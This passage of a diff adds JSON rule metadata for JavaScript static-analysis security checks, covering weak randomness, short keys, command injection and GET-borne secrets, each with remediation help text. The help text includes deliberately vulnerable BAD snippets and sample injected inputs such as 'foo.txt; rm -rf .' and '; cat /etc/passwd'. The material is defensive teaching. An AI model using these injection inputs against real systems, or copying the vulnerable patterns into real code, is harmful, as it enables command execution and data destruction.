In this case, it is much harder to predict the generated integers.\n\n\n```javascript\nfunction securePassword() {\n // GOOD: the random suffix is cryptographically secure\n var suffix = window.crypto.getRandomValues(new Uint32Array(1))[0];\n var password = \"myPassword\" + suffix;\n return password;\n}\n\n```\n\n## References\n* Wikipedia: [Pseudo-random number generator](http://en.wikipedia.org/wiki/Pseudorandom_number_generator).\n* Mozilla Developer Network: [RandomSource.getRandomValues](https://developer.mozilla.org/en-US/docs/Web/API/RandomSource/getRandomValues).\n* NodeJS: [crypto.randomBytes](https://nodejs.org/api/crypto.html#crypto_crypto_randombytes_size_callback)\n* Common Weakness Enumeration: [CWE-338](https://cwe.mitre.org/data/definitions/338.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-338" ], + "description" : "Using a cryptographically weak pseudo-random number generator to generate a\n security-sensitive value may allow an attacker to predict what value will\n be generated.", + "id" : "js/insecure-randomness", + "kind" : "path-problem", + "name" : "Insecure randomness", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.8" + } + }, { + "id" : "js/insufficient-key-size", + "name" : "js/insufficient-key-size", + "shortDescription" : { + "text" : "Use of a weak cryptographic key" + }, + "fullDescription" : { + "text" : "Using a weak cryptographic key can allow an attacker to compromise security." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Use of a weak cryptographic key\nModern encryption relies on it being computationally infeasible to break the cipher and decode a message without the key. 
As computational power increases, the ability to break ciphers grows and keys need to become larger.\n\n\n## Recommendation\nAn encryption key should be at least 2048-bit long when using RSA encryption, and 128-bit long when using symmetric encryption.\n\n\n## References\n* Wikipedia: [RSA](https://en.wikipedia.org/wiki/RSA_(cryptosystem)).\n* Wikipedia: [AES](https://en.wikipedia.org/wiki/Advanced_Encryption_Standard).\n* NodeJS: [Crypto](https://nodejs.org/api/crypto.html).\n* NIST: [ Recommendation for Transitioning the Use of Cryptographic Algorithms and Key Lengths](https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-131Ar1.pdf).\n* Wikipedia: [Key size](https://en.wikipedia.org/wiki/Key_size)\n* Common Weakness Enumeration: [CWE-326](https://cwe.mitre.org/data/definitions/326.html).\n", + "markdown" : "# Use of a weak cryptographic key\nModern encryption relies on it being computationally infeasible to break the cipher and decode a message without the key. As computational power increases, the ability to break ciphers grows and keys need to become larger.\n\n\n## Recommendation\nAn encryption key should be at least 2048-bit long when using RSA encryption, and 128-bit long when using symmetric encryption.\n\n\n## References\n* Wikipedia: [RSA](https://en.wikipedia.org/wiki/RSA_(cryptosystem)).\n* Wikipedia: [AES](https://en.wikipedia.org/wiki/Advanced_Encryption_Standard).\n* NodeJS: [Crypto](https://nodejs.org/api/crypto.html).\n* NIST: [ Recommendation for Transitioning the Use of Cryptographic Algorithms and Key Lengths](https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-131Ar1.pdf).\n* Wikipedia: [Key size](https://en.wikipedia.org/wiki/Key_size)\n* Common Weakness Enumeration: [CWE-326](https://cwe.mitre.org/data/definitions/326.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-326" ], + "description" : "Using a weak cryptographic key can allow an attacker to compromise security.", + "id" : 
"js/insufficient-key-size", + "kind" : "problem", + "name" : "Use of a weak cryptographic key", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.5" + } + }, { + "id" : "js/shell-command-injection-from-environment", + "name" : "js/shell-command-injection-from-environment", + "shortDescription" : { + "text" : "Shell command built from environment values" + }, + "fullDescription" : { + "text" : "Building a shell command string with values from the enclosing environment may cause subtle bugs or vulnerabilities." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Shell command built from environment values\nDynamically constructing a shell command with values from the local environment, such as file paths, may inadvertently change the meaning of the shell command. Such changes can occur when an environment value contains characters that the shell interprets in a special way, for instance quotes and spaces. This can result in the shell command misbehaving, or even allowing a malicious user to execute arbitrary commands on the system.\n\n\n## Recommendation\nIf possible, use hard-coded string literals to specify the shell command to run, and provide the dynamic arguments to the shell command separately to avoid interpretation by the shell.\n\nAlternatively, if the shell command must be constructed dynamically, then add code to ensure that special characters in environment values do not alter the shell command unexpectedly.\n\n\n## Example\nThe following example shows a dynamically constructed shell command that recursively removes a temporary directory that is located next to the currently executing JavaScript file. 
Such utilities are often found in custom build scripts.\n\n\n```javascript\nvar cp = require(\"child_process\"),\n path = require(\"path\");\nfunction cleanupTemp() {\n let cmd = \"rm -rf \" + path.join(__dirname, \"temp\");\n cp.execSync(cmd); // BAD\n}\n\n```\nThe shell command will, however, fail to work as intended if the absolute path of the script's directory contains spaces. In that case, the shell command will interpret the absolute path as multiple paths, instead of a single path.\n\nFor instance, if the absolute path of the temporary directory is `/home/username/important project/temp`, then the shell command will recursively delete `/home/username/important` and `project/temp`, where the latter path gets resolved relative to the working directory of the JavaScript process.\n\nEven worse, although less likely, a malicious user could provide the path `/home/username/; cat /etc/passwd #/important project/temp` in order to execute the command `cat /etc/passwd`.\n\nTo avoid such potentially catastrophic behaviors, provide the directory as an argument that does not get interpreted by a shell:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n path = require(\"path\");\nfunction cleanupTemp() {\n let cmd = \"rm\",\n args = [\"-rf\", path.join(__dirname, \"temp\")];\n cp.execFileSync(cmd, args); // GOOD\n}\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n", + "markdown" : "# Shell command built from environment values\nDynamically constructing a shell command with values from the local environment, such as file paths, may inadvertently change the meaning of the shell command. Such changes can occur when an environment value contains characters that the shell interprets in a special way, for instance quotes and spaces. 
This can result in the shell command misbehaving, or even allowing a malicious user to execute arbitrary commands on the system.\n\n\n## Recommendation\nIf possible, use hard-coded string literals to specify the shell command to run, and provide the dynamic arguments to the shell command separately to avoid interpretation by the shell.\n\nAlternatively, if the shell command must be constructed dynamically, then add code to ensure that special characters in environment values do not alter the shell command unexpectedly.\n\n\n## Example\nThe following example shows a dynamically constructed shell command that recursively removes a temporary directory that is located next to the currently executing JavaScript file. Such utilities are often found in custom build scripts.\n\n\n```javascript\nvar cp = require(\"child_process\"),\n path = require(\"path\");\nfunction cleanupTemp() {\n let cmd = \"rm -rf \" + path.join(__dirname, \"temp\");\n cp.execSync(cmd); // BAD\n}\n\n```\nThe shell command will, however, fail to work as intended if the absolute path of the script's directory contains spaces. 
In that case, the shell command will interpret the absolute path as multiple paths, instead of a single path.\n\nFor instance, if the absolute path of the temporary directory is `/home/username/important project/temp`, then the shell command will recursively delete `/home/username/important` and `project/temp`, where the latter path gets resolved relative to the working directory of the JavaScript process.\n\nEven worse, although less likely, a malicious user could provide the path `/home/username/; cat /etc/passwd #/important project/temp` in order to execute the command `cat /etc/passwd`.\n\nTo avoid such potentially catastrophic behaviors, provide the directory as an argument that does not get interpreted by a shell:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n path = require(\"path\");\nfunction cleanupTemp() {\n let cmd = \"rm\",\n args = [\"-rf\", path.join(__dirname, \"temp\")];\n cp.execFileSync(cmd, args); // GOOD\n}\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n" + }, + "properties" : { + "tags" : [ "correctness", "security", "external/cwe/cwe-078", "external/cwe/cwe-088" ], + "description" : "Building a shell command string with values from the enclosing\n environment may cause subtle bugs or vulnerabilities.", + "id" : "js/shell-command-injection-from-environment", + "kind" : "path-problem", + "name" : "Shell command built from environment values", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "6.3" + } + }, { + "id" : "js/second-order-command-line-injection", + "name" : "js/second-order-command-line-injection", + "shortDescription" : { + "text" : "Second order command injection" + }, + "fullDescription" : { + "text" : "Using user-controlled data as arguments to some 
commands, such as git clone, can allow arbitrary commands to be executed." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Second order command injection\nSome shell commands, like `git ls-remote`, can execute arbitrary commands if a user provides a malicious URL that starts with `--upload-pack`. This can be used to execute arbitrary code on the server.\n\n\n## Recommendation\nSanitize user input before passing it to the shell command. For example, ensure that URLs are valid and do not contain malicious commands.\n\n\n## Example\nThe following example shows code that executes `git ls-remote` on a URL that can be controlled by a malicious user.\n\n\n```javascript\nconst express = require(\"express\");\nconst app = express();\n\nconst cp = require(\"child_process\");\n\napp.get(\"/ls-remote\", (req, res) => {\n const remote = req.query.remote;\n cp.execFile(\"git\", [\"ls-remote\", remote]); // NOT OK\n});\n\n```\nThe problem has been fixed in the snippet below, where the URL is validated before being passed to the shell command.\n\n\n```javascript\nconst express = require(\"express\");\nconst app = express();\n\nconst cp = require(\"child_process\");\n\napp.get(\"/ls-remote\", (req, res) => {\n const remote = req.query.remote;\n if (!(remote.startsWith(\"git@\") || remote.startsWith(\"https://\"))) {\n throw new Error(\"Invalid remote: \" + remote);\n }\n cp.execFile(\"git\", [\"ls-remote\", remote]); // OK\n});\n\n```\n\n## References\n* Max Justicz: [Hacking 3,000,000 apps at once through CocoaPods](https://justi.cz/security/2021/04/20/cocoapods-rce.html).\n* Git: [Git - git-ls-remote Documentation](https://git-scm.com/docs/git-ls-remote/2.22.0#Documentation/git-ls-remote.txt---upload-packltexecgt).\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: 
[CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n", + "markdown" : "# Second order command injection\nSome shell commands, like `git ls-remote`, can execute arbitrary commands if a user provides a malicious URL that starts with `--upload-pack`. This can be used to execute arbitrary code on the server.\n\n\n## Recommendation\nSanitize user input before passing it to the shell command. For example, ensure that URLs are valid and do not contain malicious commands.\n\n\n## Example\nThe following example shows code that executes `git ls-remote` on a URL that can be controlled by a malicious user.\n\n\n```javascript\nconst express = require(\"express\");\nconst app = express();\n\nconst cp = require(\"child_process\");\n\napp.get(\"/ls-remote\", (req, res) => {\n const remote = req.query.remote;\n cp.execFile(\"git\", [\"ls-remote\", remote]); // NOT OK\n});\n\n```\nThe problem has been fixed in the snippet below, where the URL is validated before being passed to the shell command.\n\n\n```javascript\nconst express = require(\"express\");\nconst app = express();\n\nconst cp = require(\"child_process\");\n\napp.get(\"/ls-remote\", (req, res) => {\n const remote = req.query.remote;\n if (!(remote.startsWith(\"git@\") || remote.startsWith(\"https://\"))) {\n throw new Error(\"Invalid remote: \" + remote);\n }\n cp.execFile(\"git\", [\"ls-remote\", remote]); // OK\n});\n\n```\n\n## References\n* Max Justicz: [Hacking 3,000,000 apps at once through CocoaPods](https://justi.cz/security/2021/04/20/cocoapods-rce.html).\n* Git: [Git - git-ls-remote Documentation](https://git-scm.com/docs/git-ls-remote/2.22.0#Documentation/git-ls-remote.txt---upload-packltexecgt).\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n" + }, + "properties" : { + "tags" : [ 
"correctness", "security", "external/cwe/cwe-078", "external/cwe/cwe-088" ], + "description" : "Using user-controlled data as arguments to some commands, such as git clone,\n can allow arbitrary commands to be executed.", + "id" : "js/second-order-command-line-injection", + "kind" : "path-problem", + "name" : "Second order command injection", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "7.0" + } + }, { + "id" : "js/command-line-injection", + "name" : "js/command-line-injection", + "shortDescription" : { + "text" : "Uncontrolled command line" + }, + "fullDescription" : { + "text" : "Using externally controlled strings in a command line may allow a malicious user to change the meaning of the command." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Uncontrolled command line\nCode that passes untrusted user input directly to `child_process.exec` or similar APIs that execute shell commands allows the user to execute malicious code.\n\n\n## Recommendation\nIf possible, use APIs that don't run shell commands and that accept command arguments as an array of strings rather than a single concatenated string. This is both safer and more portable.\n\nIf given arguments as a single string, avoid simply splitting the string on whitespace. Arguments may contain quoted whitespace, causing them to split into multiple arguments. 
Use a library like `shell-quote` to parse the string into an array of arguments instead.\n\nIf this approach is not viable, then add code to verify that the user input string is safe before using it.\n\n\n## Example\nThe following example shows code that extracts a filename from an HTTP query parameter that may contain untrusted data, and then embeds it into a shell command to count its lines without examining it first:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n http = require('http'),\n url = require('url');\n\nvar server = http.createServer(function(req, res) {\n let file = url.parse(req.url, true).query.path;\n\n cp.execSync(`wc -l ${file}`); // BAD\n});\n\n```\nA malicious user can take advantage of this code by executing arbitrary shell commands. For example, by providing a filename like `foo.txt; rm -rf .`, the user can first count the lines in `foo.txt` and subsequently delete all files in the current directory.\n\nTo avoid this catastrophic behavior, use an API such as `child_process.execFileSync` that does not spawn a shell by default:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n http = require('http'),\n url = require('url');\n\nvar server = http.createServer(function(req, res) {\n let file = url.parse(req.url, true).query.path;\n\n cp.execFileSync('wc', ['-l', file]); // GOOD\n});\n\n```\nIf you want to allow the user to specify other options to `wc`, you can use a library like `shell-quote` to parse the user input into an array of arguments without risking command injection:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n http = require('http'),\n url = require('url'),\n shellQuote = require('shell-quote');\n\nvar server = http.createServer(function(req, res) {\n let options = url.parse(req.url, true).query.options;\n\n cp.execFileSync('wc', shellQuote.parse(options)); // GOOD\n});\n\n```\nAlternatively, the original example can be made safe by checking the filename against an allowlist of safe characters before 
using it:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n http = require('http'),\n url = require('url');\n\nvar server = http.createServer(function(req, res) {\n let file = url.parse(req.url, true).query.path;\n\n // only allow safe characters in file name\n if (file.match(/^[\\w\\.\\-\\/]+$/)) {\n cp.execSync(`wc -l ${file}`); // GOOD\n }\n});\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* npm: [shell-quote](https://www.npmjs.com/package/shell-quote).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n", + "markdown" : "# Uncontrolled command line\nCode that passes untrusted user input directly to `child_process.exec` or similar APIs that execute shell commands allows the user to execute malicious code.\n\n\n## Recommendation\nIf possible, use APIs that don't run shell commands and that accept command arguments as an array of strings rather than a single concatenated string. This is both safer and more portable.\n\nIf given arguments as a single string, avoid simply splitting the string on whitespace. Arguments may contain quoted whitespace, causing them to split into multiple arguments. 
Use a library like `shell-quote` to parse the string into an array of arguments instead.\n\nIf this approach is not viable, then add code to verify that the user input string is safe before using it.\n\n\n## Example\nThe following example shows code that extracts a filename from an HTTP query parameter that may contain untrusted data, and then embeds it into a shell command to count its lines without examining it first:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n http = require('http'),\n url = require('url');\n\nvar server = http.createServer(function(req, res) {\n let file = url.parse(req.url, true).query.path;\n\n cp.execSync(`wc -l ${file}`); // BAD\n});\n\n```\nA malicious user can take advantage of this code by executing arbitrary shell commands. For example, by providing a filename like `foo.txt; rm -rf .`, the user can first count the lines in `foo.txt` and subsequently delete all files in the current directory.\n\nTo avoid this catastrophic behavior, use an API such as `child_process.execFileSync` that does not spawn a shell by default:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n http = require('http'),\n url = require('url');\n\nvar server = http.createServer(function(req, res) {\n let file = url.parse(req.url, true).query.path;\n\n cp.execFileSync('wc', ['-l', file]); // GOOD\n});\n\n```\nIf you want to allow the user to specify other options to `wc`, you can use a library like `shell-quote` to parse the user input into an array of arguments without risking command injection:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n http = require('http'),\n url = require('url'),\n shellQuote = require('shell-quote');\n\nvar server = http.createServer(function(req, res) {\n let options = url.parse(req.url, true).query.options;\n\n cp.execFileSync('wc', shellQuote.parse(options)); // GOOD\n});\n\n```\nAlternatively, the original example can be made safe by checking the filename against an allowlist of safe characters before 
using it:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n http = require('http'),\n url = require('url');\n\nvar server = http.createServer(function(req, res) {\n let file = url.parse(req.url, true).query.path;\n\n // only allow safe characters in file name\n if (file.match(/^[\\w\\.\\-\\/]+$/)) {\n cp.execSync(`wc -l ${file}`); // GOOD\n }\n});\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* npm: [shell-quote](https://www.npmjs.com/package/shell-quote).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n" + }, + "properties" : { + "tags" : [ "correctness", "security", "external/cwe/cwe-078", "external/cwe/cwe-088" ], + "description" : "Using externally controlled strings in a command line may allow a malicious\n user to change the meaning of the command.", + "id" : "js/command-line-injection", + "kind" : "path-problem", + "name" : "Uncontrolled command line", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "9.8" + } + }, { + "id" : "js/unnecessary-use-of-cat", + "name" : "js/unnecessary-use-of-cat", + "shortDescription" : { + "text" : "Unnecessary use of `cat` process" + }, + "fullDescription" : { + "text" : "Using the `cat` process to read a file is unnecessarily complex, inefficient, unportable, and can lead to subtle bugs, or even security vulnerabilities." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Unnecessary use of `cat` process\nUsing the unix command `cat` only to read a file is an unnecessarily complex way to achieve something that can be done in a simpler and safer manner using the Node.js `fs.readFile` API.\n\nThe use of `cat` for simple file reads leads to code that is unportable, inefficient, complex, and can lead to subtle bugs or even security vulnerabilities.\n\n\n## Recommendation\nUse `fs.readFile` or `fs.readFileSync` to read files from the file system.\n\n\n## Example\nThe following example shows code that reads a file using `cat`:\n\n\n```javascript\nvar child_process = require('child_process');\n\nmodule.exports = function (name) {\n return child_process.execSync(\"cat \" + name).toString();\n};\n\n```\nThe code in the example will break if the input `name` contains special characters (including space). Additionally, it does not work on Windows and if the input is user-controlled, a command injection attack can happen.\n\nThe `fs.readFile` API should be used to avoid these potential issues:\n\n\n```javascript\nvar fs = require('fs');\n\nmodule.exports = function (name) {\n return fs.readFileSync(name).toString();\n};\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* Node.js: [File System API](https://nodejs.org/api/fs.html).\n* [The Useless Use of Cat Award](http://porkmail.org/era/unix/award.html#cat).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n", + "markdown" : "# Unnecessary use of `cat` process\nUsing the unix command `cat` only to read a file is an unnecessarily complex way to achieve something that can be done in a simpler and safer manner using the Node.js `fs.readFile` API.\n\nThe use of `cat` for simple file reads leads to code that is unportable, inefficient, complex, and can lead to subtle bugs or even security 
vulnerabilities.\n\n\n## Recommendation\nUse `fs.readFile` or `fs.readFileSync` to read files from the file system.\n\n\n## Example\nThe following example shows code that reads a file using `cat`:\n\n\n```javascript\nvar child_process = require('child_process');\n\nmodule.exports = function (name) {\n return child_process.execSync(\"cat \" + name).toString();\n};\n\n```\nThe code in the example will break if the input `name` contains special characters (including space). Additionally, it does not work on Windows and if the input is user-controlled, a command injection attack can happen.\n\nThe `fs.readFile` API should be used to avoid these potential issues:\n\n\n```javascript\nvar fs = require('fs');\n\nmodule.exports = function (name) {\n return fs.readFileSync(name).toString();\n};\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* Node.js: [File System API](https://nodejs.org/api/fs.html).\n* [The Useless Use of Cat Award](http://porkmail.org/era/unix/award.html#cat).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n" + }, + "properties" : { + "tags" : [ "correctness", "security", "maintainability", "external/cwe/cwe-078" ], + "description" : "Using the `cat` process to read a file is unnecessarily complex, inefficient, unportable, and can lead to subtle bugs, or even security vulnerabilities.", + "id" : "js/unnecessary-use-of-cat", + "kind" : "problem", + "name" : "Unnecessary use of `cat` process", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "6.3" + } + }, { + "id" : "js/shell-command-constructed-from-input", + "name" : "js/shell-command-constructed-from-input", + "shortDescription" : { + "text" : "Unsafe shell command constructed from library input" + }, + "fullDescription" : { + "text" : "Using externally controlled strings in a command line may allow a malicious user to change the meaning of the command." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Unsafe shell command constructed from library input\nDynamically constructing a shell command with inputs from exported functions may inadvertently change the meaning of the shell command. Clients using the exported function may use inputs containing characters that the shell interprets in a special way, for instance quotes and spaces. This can result in the shell command misbehaving, or even allowing a malicious user to execute arbitrary commands on the system.\n\n\n## Recommendation\nIf possible, provide the dynamic arguments to the shell as an array using a safe API such as `child_process.execFile` to avoid interpretation by the shell.\n\nIf given arguments as a single string, avoid simply splitting the string on whitespace. Arguments may contain quoted whitespace, causing them to split into multiple arguments. Use a library like `shell-quote` to parse the string into an array of arguments instead.\n\nAlternatively, if the command must be interpreted by a shell (for example because it includes I/O redirections), you can use `shell-quote` to escape any special characters in the input before embedding it in the command.\n\n\n## Example\nThe following example shows a dynamically constructed shell command that downloads a file from a remote URL.\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nmodule.exports = function download(path, callback) {\n cp.exec(\"wget \" + path, callback);\n}\n\n```\nThe shell command will, however, fail to work as intended if the input contains spaces or other special characters interpreted in a special way by the shell.\n\nEven worse, a client might pass in user-controlled data, not knowing that the input is interpreted as a shell command. 
This could allow a malicious user to provide the input `http://example.org; cat /etc/passwd` in order to execute the command `cat /etc/passwd`.\n\nTo avoid such potentially catastrophic behaviors, provide the inputs from exported functions as an argument that does not get interpreted by a shell:\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nmodule.exports = function download(path, callback) {\n cp.execFile(\"wget\", [path], callback);\n}\n\n```\nAs another example, consider the following code which is similar to the preceding example, but pipes the output of `wget` into `wc -l` to count the number of lines in the downloaded file.\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nmodule.exports = function download(path, callback) {\n cp.exec(\"wget \" + path + \" | wc -l\", callback);\n};\n\n```\nIn this case, using `child_process.execFile` is not an option because the shell is needed to interpret the pipe operator. Instead, you can use `shell-quote` to escape the input before embedding it in the command:\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nmodule.exports = function download(path, callback) {\n cp.exec(\"wget \" + shellQuote.quote([path]) + \" | wc -l\", callback);\n};\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* npm: [shell-quote](https://www.npmjs.com/package/shell-quote).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n", + "markdown" : "# Unsafe shell command constructed from library input\nDynamically constructing a shell command with inputs from exported functions may inadvertently change the meaning of the shell command. Clients using the exported function may use inputs containing characters that the shell interprets in a special way, for instance quotes and spaces. 
This can result in the shell command misbehaving, or even allowing a malicious user to execute arbitrary commands on the system.\n\n\n## Recommendation\nIf possible, provide the dynamic arguments to the shell as an array using a safe API such as `child_process.execFile` to avoid interpretation by the shell.\n\nIf given arguments as a single string, avoid simply splitting the string on whitespace. Arguments may contain quoted whitespace, causing them to split into multiple arguments. Use a library like `shell-quote` to parse the string into an array of arguments instead.\n\nAlternatively, if the command must be interpreted by a shell (for example because it includes I/O redirections), you can use `shell-quote` to escape any special characters in the input before embedding it in the command.\n\n\n## Example\nThe following example shows a dynamically constructed shell command that downloads a file from a remote URL.\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nmodule.exports = function download(path, callback) {\n cp.exec(\"wget \" + path, callback);\n}\n\n```\nThe shell command will, however, fail to work as intended if the input contains spaces or other special characters interpreted in a special way by the shell.\n\nEven worse, a client might pass in user-controlled data, not knowing that the input is interpreted as a shell command. 
This could allow a malicious user to provide the input `http://example.org; cat /etc/passwd` in order to execute the command `cat /etc/passwd`.\n\nTo avoid such potentially catastrophic behaviors, provide the inputs from exported functions as an argument that does not get interpreted by a shell:\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nmodule.exports = function download(path, callback) {\n cp.execFile(\"wget\", [path], callback);\n}\n\n```\nAs another example, consider the following code which is similar to the preceding example, but pipes the output of `wget` into `wc -l` to count the number of lines in the downloaded file.\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nmodule.exports = function download(path, callback) {\n cp.exec(\"wget \" + path + \" | wc -l\", callback);\n};\n\n```\nIn this case, using `child_process.execFile` is not an option because the shell is needed to interpret the pipe operator. Instead, you can use `shell-quote` to escape the input before embedding it in the command:\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nmodule.exports = function download(path, callback) {\n cp.exec(\"wget \" + shellQuote.quote([path]) + \" | wc -l\", callback);\n};\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* npm: [shell-quote](https://www.npmjs.com/package/shell-quote).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n" + }, + "properties" : { + "tags" : [ "correctness", "security", "external/cwe/cwe-078", "external/cwe/cwe-088" ], + "description" : "Using externally controlled strings in a command line may allow a malicious\n user to change the meaning of the command.", + "id" : "js/shell-command-constructed-from-input", + "kind" : "path-problem", + "name" : "Unsafe shell command constructed from library input", + 
"precision" : "high", + "problem.severity" : "error", + "security-severity" : "6.3" + } + }, { + "id" : "js/sensitive-get-query", + "name" : "js/sensitive-get-query", + "shortDescription" : { + "text" : "Sensitive data read from GET request" + }, + "fullDescription" : { + "text" : "Placing sensitive data in a GET request increases the risk of the data being exposed to an attacker." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Sensitive data read from GET request\nSensitive information such as user passwords should not be transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing sensitive information into the URL therefore increases the risk that it will be captured by an attacker.\n\n\n## Recommendation\nUse HTTP POST to send sensitive information as part of the request body; for example, as form data.\n\n\n## Example\nThe following example shows two route handlers that both receive a username and a password. The first receives this sensitive information from the query parameters of a GET request, which is transmitted in the URL. 
The second receives this sensitive information from the request body of a POST request.\n\n\n```javascript\nconst express = require('express');\nconst app = express();\napp.use(require('body-parser').urlencoded({ extended: false }))\n\n// bad: sensitive information is read from query parameters\napp.get('/login1', (req, res) => {\n const user = req.query.user;\n const password = req.query.password;\n if (checkUser(user, password)) {\n res.send('Welcome');\n } else {\n res.send('Access denied');\n }\n});\n\n// good: sensitive information is read from post body\napp.post('/login2', (req, res) => {\n const user = req.body.user;\n const password = req.body.password;\n if (checkUser(user, password)) {\n res.send('Welcome');\n } else {\n res.send('Access denied');\n }\n});\n\n```\n\n## References\n* CWE: [CWE-598: Use of GET Request Method with Sensitive Query Strings](https://cwe.mitre.org/data/definitions/598.html)\n* PortSwigger (Burp): [Password Submitted using GET Method](https://portswigger.net/kb/issues/00400300_password-submitted-using-get-method)\n* OWASP: [Information Exposure through Query Strings in URL](https://owasp.org/www-community/vulnerabilities/Information_exposure_through_query_strings_in_url)\n* Common Weakness Enumeration: [CWE-598](https://cwe.mitre.org/data/definitions/598.html).\n", + "markdown" : "# Sensitive data read from GET request\nSensitive information such as user passwords should not be transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. 
Placing sensitive information into the URL therefore increases the risk that it will be captured by an attacker.\n\n\n## Recommendation\nUse HTTP POST to send sensitive information as part of the request body; for example, as form data.\n\n\n## Example\nThe following example shows two route handlers that both receive a username and a password. The first receives this sensitive information from the query parameters of a GET request, which is transmitted in the URL. The second receives this sensitive information from the request body of a POST request.\n\n\n```javascript\nconst express = require('express');\nconst app = express();\napp.use(require('body-parser').urlencoded({ extended: false }))\n\n// bad: sensitive information is read from query parameters\napp.get('/login1', (req, res) => {\n const user = req.query.user;\n const password = req.query.password;\n if (checkUser(user, password)) {\n res.send('Welcome');\n } else {\n res.send('Access denied');\n }\n});\n\n// good: sensitive information is read from post body\napp.post('/login2', (req, res) => {\n const user = req.body.user;\n const password = req.body.password;\n if (checkUser(user, password)) {\n res.send('Welcome');\n } else {\n res.send('Access denied');\n }\n});\n\n```\n\n## References\n* CWE: [CWE-598: Use of GET Request Method with Sensitive Query Strings](https://cwe.mitre.org/data/definitions/598.html)\n* PortSwigger (Burp): [Password Submitted using GET Method](https://portswigger.net/kb/issues/00400300_password-submitted-using-get-method)\n* OWASP: [Information Exposure through Query Strings in URL](https://owasp.org/www-community/vulnerabilities/Information_exposure_through_query_strings_in_url)\n* Common Weakness Enumeration: [CWE-598](https://cwe.mitre.org/data/definitions/598.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-598" ], + "description" : "Placing sensitive data in a GET request increases the risk 